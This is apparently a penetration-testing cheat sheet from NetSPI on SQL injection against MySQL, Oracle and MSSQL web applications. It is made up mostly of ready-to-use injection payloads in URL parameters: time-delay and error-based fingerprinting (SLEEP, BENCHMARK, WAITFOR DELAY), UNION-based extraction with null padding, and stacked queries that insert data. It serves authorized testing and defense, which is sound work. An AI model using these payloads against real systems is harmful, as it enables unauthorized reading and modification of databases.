DBMS Identification

Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.

Note: The comment characters  --  are placed after the query to remove any commmands following our query, helping to prevent errors.

Description Query
SLEEP page.php?id=1'-SLEEP(1)=0 LIMIT 1 --
BENCHMARK page.php?id=1'-BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds'))=0 LIMIT 1 --
String concatenation page.php?id=' 'mysql' --
Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.
page.php?id='

General Tips

PHP applications generally have MySQL databases.

Converting queries to injections

Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT @@version will be the example query.

Description Query
Union product.php?id=' UNION SELECT @@version --
Union subquery product.php?id=' UNION (SELECT @@version) --
Union null
Note: If original query returns more than one column, add null to equal the number of columns
product.php?id=4 UNION SELECT @@version,null --
Stacked Queries
Note: Stacked queries do not always return results, so they are best used for injections that update/modify data.
product.php?id='; INSERT INTO 'docs' ('content') VALUES ((SELECT @@version)) --

DBMS Identification

Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.

Note: The comment characters  --  are placed after the query to remove any commmands following our query, helping to prevent errors.

Description Query
String concatenation page.jsp?id='||'oracle' --
Default table page.jsp?id='UNION SELECT 1 FROM v$version --
Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.
page.jsp?id='

General Tips

Depending on the error provided by the application, if there is an “ORA-XXXX" error where each X is an integer, that means the database is Oracle

JSP applications generally have Oracle databases.

Converting queries to injections

Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT banner FROM v$version will be the example query.

Description Query
Union product.jsp?id=' UNION SELECT banner FROM v$version --
Union subquery product.jsp?id=' UNION (SELECT banner FROM v$version) --
Union null
Note: If original query returns more than one column, add null to equal the number of columns-1
product.jsp?id=' UNION SELECT banner,null FROM v$version --

DBMS Identification

Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.

Note: The comment characters  --  are placed after the query to remove any commmands following our query, helping to prevent errors.

Description Query
WAITFOR Function page.asp?id=';WAITFOR DELAY '00:00:10'; --
Default variable page.asp?id=sql'; SELECT @@SERVERNAME --
Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.
page.asp?id='
Error messages
Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error.
page.asp?id=@@SERVERNAME
Error messages
Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error.
page.asp?id=0/@@SERVERNAME

General Tips

ASP/ASPX based applications are generally MSSQL.

Converting queries to injections

Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT @@version will be the example query.

Description Query
Union product.asp?id=' UNION SELECT @@version --
Union subquery product.asp?id=' UNION (SELECT @@version) --
Union null
Note: If original query returns more than one column, add null to equal the number of columns
product.asp?id=' UNION (SELECT @@version,null) --
Stacked query
Note: Stacked queries do not always return results, so they are best used for injections that update/modify data.
product.asp?id='; SELECT @@version --

© 2018 Copyright by NetSPI. All rights reserved.